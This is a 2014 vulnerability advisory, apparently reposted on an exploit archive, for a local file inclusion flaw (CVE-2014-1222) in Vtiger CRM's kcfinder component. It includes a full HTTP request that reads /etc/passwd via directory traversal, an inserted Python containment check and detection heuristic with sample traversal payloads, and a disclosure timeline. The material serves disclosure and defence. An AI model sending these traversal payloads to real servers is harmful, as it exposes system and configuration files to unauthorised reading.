Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability

2014-03-1200:00:00
Portcullis
0day.today
EPSS: 0.043 (Low), percentile 91.3%

Vtiger CRM versions 5.4.0, 6.0 RC, and 6.0.0 GA suffer from a local file inclusion vulnerability.

CVE:    CVE-2014-1222
Vendor:     Vtiger
Product:    CRM
Affected version:   Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version:  Vtiger 6.0.0 Security patch 1
Reported by:    Jerzy Kramarz
Details:
 
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
 
The following request is a Proof-of-Concept for retrieving the /etc/passwd file from a remote system.
 
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
 
dir=files&file=/../../../../../../../../../../../etc/passwd
 
Note: In order to exploit this vulnerability, an attacker has to be authenticated.
Impact:
 
This vulnerability gives an attacker the ability to read local files from the server filesystem.
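The mitigation for this class of bug is to canonicalise the joined path and check that it still lies under the storage root, rather than trying to filter traversal sequences out of the input. The block below is an added example in Python (not vtiger or kcfinder code; kcfinder's download handler is PHP) showing that containment check next to a log-review heuristic that flags requests of the shape shown above, including percent-encoded and double-encoded variants. The storage root `/srv/vtiger/storage` and the sample request bodies are constructed for the example.

```python
import os
from urllib.parse import parse_qs, unquote

# Constructed storage root for the example; the real kcfinder upload
# directory is not named in the advisory.
SAFE_BASE = "/srv/vtiger/storage"


def resolve_download_path(base_dir, dir_param, file_param):
    """Return the canonical absolute path of the requested file if it lies
    inside base_dir, otherwise None.

    The join mirrors what a naive download handler does (base + dir + file);
    the protection comes from canonicalising the result and checking
    containment, not from stripping ".." out of the parameters.
    """
    if "\x00" in dir_param or "\x00" in file_param:
        return None
    base_real = os.path.realpath(base_dir)
    # A leading "/" on either parameter would make os.path.join discard
    # base_dir entirely, so both are forced to be relative before joining.
    candidate = os.path.realpath(
        os.path.join(base_real, dir_param.lstrip("/"), file_param.lstrip("/"))
    )
    # commonpath() of the canonical paths is the containment test:
    # "/etc/passwd" shares only "/" with the base directory and is rejected.
    if candidate == base_real or os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def is_traversal_attempt(raw_value, max_decodes=3):
    """Log-review heuristic: True if the value contains a ".." path segment or
    is an absolute path after percent-decoding (repeated, to catch double
    encoding) and backslash normalisation."""
    value = raw_value
    for _ in range(max_decodes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    return value.startswith("/") or ".." in value.split("/")


# Constructed sample request bodies (not captured traffic). The first has the
# shape of the advisory's PoC body; the third hides the traversal behind
# percent-encoding; the others are benign downloads.
SAMPLE_BODIES = [
    "dir=files&file=/../../../../../../../../../../../etc/passwd",
    "dir=files&file=report_q1.pdf",
    "dir=files%2F2014&file=%2E%2E%2F%2E%2E%2Fconfig.inc.php",
    "dir=images&file=logo.png",
]


def flag_traversal_requests(bodies, params=("dir", "file")):
    """Return the indices of request bodies whose dir/file parameters look
    like traversal attempts."""
    flagged = []
    for index, body in enumerate(bodies):
        fields = parse_qs(body, keep_blank_values=True)
        values = [v for name in params for v in fields.get(name, [])]
        if any(is_traversal_attempt(v) for v in values):
            flagged.append(index)
    return flagged


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        fields = parse_qs(body, keep_blank_values=True)
        resolved = resolve_download_path(
            SAFE_BASE, fields.get("dir", [""])[0], fields.get("file", [""])[0]
        )
        print(f"{body!r} -> {'REJECTED' if resolved is None else resolved}")
    print("flagged for review:", flag_traversal_requests(SAMPLE_BODIES))
```

The containment check is the one that actually closes the hole; the heuristic is only for triaging access logs or request captures after the fact, since a determined encoding variant can slip past a pattern check but not past canonicalisation.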
Exploit:
 
Exploit code is not required.
 
Vendor status:
23/12/2013  Advisory created
03/01/2014  Vendor contacted
14/01/2014  CVE obtained
27/01/2014  Vendor contact reattempted
10/02/2014  Vendor working on a fix
12/02/2014  Fix released
13/02/2014  Fix confirmed
11/03/2014  Published

#  0day.today [2018-01-02]  #